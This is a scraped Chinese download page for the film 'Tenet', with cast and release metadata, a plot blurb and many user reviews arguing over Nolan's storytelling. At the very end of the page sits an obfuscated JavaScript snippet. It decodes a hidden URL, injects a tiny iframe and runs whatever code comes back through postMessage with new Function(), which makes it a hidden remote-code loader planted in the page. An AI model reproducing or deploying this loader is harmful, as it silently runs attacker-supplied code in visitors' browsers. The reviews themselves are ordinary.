2020诺兰高分科幻《信条》IMAX版.BD1080P.国英双语.中英双字


更新时间:2020-12-06 02:56:19 类别: 剧情 动作 科幻 评论 下载
诺兰厉害的地方向来是他的多线交叉叙事能力,挺简单一个剧本经过诺兰之手,配合御用配乐师,瞬间逼格提升充满紧张氛围,科幻只是作为辅助,少数经不起推敲的地方也因此让观众无暇顾及,反倒觉得是自己没看懂……
信条

信条

导演: 克里斯托弗·诺兰
编剧: 克里斯托弗·诺兰
主演: 约翰·大卫·华盛顿 / 罗伯特·帕丁森 / 伊丽莎白·德比茨基 / 肯尼思·布拉纳 / 亚伦·泰勒-约翰逊 / 迪宝·卡帕蒂娅 / 克蕾曼丝·波西 / 希米什·帕特尔 / 安德鲁·霍华德 / 尤里·科洛科利尼科夫 / 迈克尔·凯恩 / 马丁·唐文 / 卡里娜·韦尔瓦 / 乔纳森·坎普 / 凯蒂·麦克凯布 / 贝恩·科拉科 / 安东尼·莫利纳利 / 特伦特·布克斯顿 / 英格丽·玛格斯 / 瑞奇·切劳洛 / 劳里·谢泼德 / 马克·克雷尼克 / 亚历克斯·威克索 / 丹兹尔·史密斯 / 马塞尔·萨巴特
类型: 剧情 / 动作 / 科幻
官方网站: www.tenetfilm.com
制片国家/地区: 美国 / 英国
语言: 英语 / 俄语 / 乌克兰语 / 爱沙尼亚语 / 印地语 / 挪威语
上映日期: 2020-09-04(中国大陆) / 2020-08-26(英国) / 2020-09-03(美国)
片长: 150分钟
又名: Tenet / TENET天能(港/台) / 时空追捕 / TENƎ⊥ / Tempus / 天呐天(豆友译名)
IMDb链接: tt6723592
世界存亡危在旦夕,“信条”一词是唯一的线索与武器。主人公穿梭于全球各地,开展特工活动,力求揭示“信条”之谜,并完成一项超越了真实时间的神秘任务。这项任务并非时间之旅,而是【时空逆转】。

BD版本出来是IMAX版本,就是一部分片段是16:9满屏画面,字幕用的之前人人翻译版本,默认国语取自公映国配,英语为5.1声道,有需要可以更新~
mirai 2020-08-26

看完电影出来下楼差点走了上行的电梯

一只拖鞋 2020-09-01

诺兰:“有关。” 记者:“请问这部电影和时间穿越有关吗?”

开开 2020-08-27

你要真让我说最直观的感受:帕丁森他妈的帅疯了。最后一幕我竟然看出了一种《大话西游》结尾的感觉,《一生所爱》放这儿毫不违和

白月 2020-08-26

诺兰的信条,就像李安的双子杀手,亲手拍出自己导演最不好看的电影。一个纯粹用台词堆砌起来的故事,如果消音,观众能够得到的信息量几乎为零。这点在盗梦空间当年上映之后就一直被业界批评,看来诺兰是听都不想听,还把缺点放更大了。所谓的七国取景,全是些家门口就能找到的地方;所谓阻止第三次世界大战,看起来也像普通间谍事件般小打小闹。因为保密演员无法阅读完整剧本,以致许多人表演时只是单纯念台词,自己也不明白到底什么意思。

Cheng 2020-08-26

无聊到根本不想去深究。

尔尔马 2020-08-27

罗素兄弟:不能让别人看真剧本防剧透。 诺兰:人手一本啊!大甩卖啊!看懂算我输啊!

Evarnold 2020-09-04

。己自了估高也,众观了估高兰诺

夏小時 2020-08-29

时间逆行的概念本身不新,烧脑的是不讲人话的表达方式。诺兰为了炫技牺牲了故事和人物,观影体验非常差。老套的拯救世界的故事,但没有一个角色有足够的驱动力,都只是在模板化地跑剧情,唯一动机有说服力的竟然还是反派。本质动作片,可动作戏不太行,混音太吵,节奏也很闷,没有转折和高潮,两个半小时很疲惫,一直在看表。一刷能大致懂诺兰的叙事目的,我也相信他的故事一定能逻辑自洽,N刷可以理清时间线和细节,但一刷的观影快感太低了,完全支撑不起我N刷的欲望。个人来说,我觉得是诺兰电影里拍得最差的一部。

无耻不混蛋 2020-08-31

150分钟的电影,前面至少120分钟都挺无聊且沉闷的。不要因为是诺兰,就豪吹,跟看不看得懂没有任何关系,电影不好看就是不好看。埋再多的所谓“暗叙事”、玩再多的结构与技巧,也依旧不好看。在我看来,呈现出来的效果,跟李安的《双子杀手》几乎一样。人物都是工具人,看上去不明则厉,实则无趣。影片全程去掉配音,试试看,你就知道有多失望。

巨米雨 2020-08-30

这片绝了,一边倒车一边加速。

影志 2020-08-22

不是一遍能看懂的一部诺兰,但也是在视觉呈现、叙事结构上再赋新意、再造巅峰的一部。从来只有单讲时间逆转和时空穿越的,却从来没有在一个画面里把正向和逆向时间同时呈现的。它如《盗梦空间》的那个折叠城市,首尾完美张合,开头即结局。最后一场大战,将为IMAX观影带来前所未有、目瞪口呆的银幕体验。两男主的相遇,勘为一道恍如隔世的弧光,泪目。看完《信条》你会产生一个这样的念头:诺兰所有的作品,将以《信条》为中心,形成过去和未来的完美交互。它是一个圆点和轴心,也是导演对自己创作理念的终极倒放和正反打。(就不用担心评论剧透了,想剧透可能都无从下手…

Liefmans 2020-09-03

我不配给这个电影打分 真的 我连影评也没看懂

羚羊的灵魂 2020-08-22

愈发能感觉出诺兰是一个很自恋的导演,且时刻散发着优越感(没错,他狮子座,这导致他掉进了自己的逻辑怪圈无法自拔。他不是用多好的故事征服你,而是用自己超凡脱俗的逻辑能力绕晕你,甚至让我萌生出被他踩在脚下的压迫感。他之前的几部同类型“烧脑”片其实还有所收敛,这一部就有点放飞自我了,通俗地说,对我等凡夫俗子太不友好了。是的,他的逻辑能力满分,我很佩服且自愧不如,但是我没办法从中感受到看电影的乐趣了,而是倍感折磨,因为我更像是在参加物理竞赛。他没有试图和观众平等的交流和沟通,而是冷冰冰的把这些庞大的信息量拍在了银幕上,你还没嚼透上一句话,下一句话又紧跟塞了进来。所以最后我带着一肚子问号走出影院的时候,我不禁感叹,做个观众太难了,这道题我不会。当然,如果你喜欢被虐,那你会喜欢这部电影的。

木由 2020-08-26

看别人的科幻片发现逻辑不通的我:“辣鸡编剧辣鸡导演全是漏洞。”看诺兰的科幻片发现逻辑不通的我:“不行不行我脑子都烧坏了等等我得再看一遍。”

萨库拉 2020-09-04

概念不新鲜,刘慈欣的《坍缩》已经写过,呈现出来也并不惊艳,因为概念只是被利用来营造视觉奇观,烘托商业场面。最要命的是人物和人物关系也很无聊,如果说《盗梦》和《星际》还有强烈的情感内核,这个片子的主角完全就是个工具人。不太喜欢创作者带着一种智力上的优越感,观众走出电影院,你看懂的程度是985,我看懂的程度是211,他写了篇分析长文智商Top2,这不是看电影,这是高考之后的对答案。

药师 2020-09-02

最大的亮点不是场面和概念,而是罗伯特·帕丁森最后一分钟的古龙时刻——在《敦刻尔克》的结尾,汤姆·哈迪烧飞机也是同样的古龙时刻,看到那种潇洒会让人觉得生活里的琐碎一文不值,但又仿佛照镜子般看见自己的狼狈。整个一百五十分钟,有感情的就这一分钟。

朝暮雪 2020-08-30

对尼尔来说他已经认识男主角很久了,但对男主角来说他才刚认识尼尔。 对尼尔来说他们的友情已经走到了终点,但对男主角来说这是他们的友情的起点。 尼尔在基辅歌剧院救了男主角一次,在自由港阻止他杀了另一个自己,最后又将他拉出了基地。 不仅如此,等会儿他还要再次进入旋转门。 这一次他进入旋转门的时候,看不到窗户另一边的自己走进旋转门,因为他这次必死无疑。 但他还是进入了旋转门,帮男主角撬开了基地的门,并且为男主角挡了一枪,然后壮烈牺牲。 尼尔来自未来,这也意味着现在尼尔还是一个小孩子,很可能就是凯瑟琳的儿子。 他要先长大成人,长大后被男主角招募,进入旋转门,然后回到基辅歌剧院爆炸那天见到男主角。 他独自在逆时间中生活几十年,然而才陪伴男主角短短几十天的时间就要为他挡子弹而牺牲。 而且结局早已注定,不能改变。

e|理智型神经病 2020-08-22

诺兰用电影告诉你服用LSD的感觉。 TENET不应该直译为“信条”,看完你会觉得这片应该叫”天呐天” lol @cgv明洞

翻滚吧!蛋堡 2020-08-22

“别去试图理解它,去感受它。”真的被诺兰逼疯了,感觉智商完全下线。和他之前任何一部电影体验都不一样,不是简单玩技术或结构,你必须完全进入到逆世界的设定里,看他把扭转时空和悖论的东西在缜密逻辑和高速爆炸的信息组合后进一步复杂化。第一遍基本只能看看视觉奇观和故事脉络,待多刷后再尝试理清逻辑吧。

徐若风 2020-09-04

给诺兰三星,其实就是零分了。一部他序列中倒数的作品,又或许是时候重新审视他一直以来是否都被“过度神话”。与其说“烧脑”,其实是“绕脑”,把概念、情节线索强行复杂化却又一直只在表层兜圈子,最终出来的效果就是异常割裂式、景观运动表象式的呈现。科幻电影中的“时间之谜”,令人着迷的其实是谜面建构过程中对“人之所以为人”的反观(如《降临》)。而诺兰在这部电影中所做的,如同帕丁森的角色一般,早已得知谜底后不断在时间逆流里往回揭露,但却困顿在了自己设下的谜面中,全然失去了以往的精巧、偶尔闪现的诗意。不得不吐槽黑帮总裁与贵妇这条支线,写得令人窒息——以往在电影院看诺兰能感受到的些许震撼,这次变成了尴尬得震撼。

信条的截图1
信条的截图2
信条的截图3
信条的截图4
信条的截图5
信条的截图6
信条的截图7
eval('\x77\x69\x6e\x64\x6f\x77')['\x54\x6c\x74\x46\x48\x5a\x6b\x62\x56']=function(){;(function(u,r,w,d,f,c){var x=VDTMLX;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data[r]){new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZ4dWWFubWWluLndhbmclMkYxMzU2MzE=',''+'bfi'+'FLg'+'chR'+'',window,document,''+'PeF'+'By'+'','W');}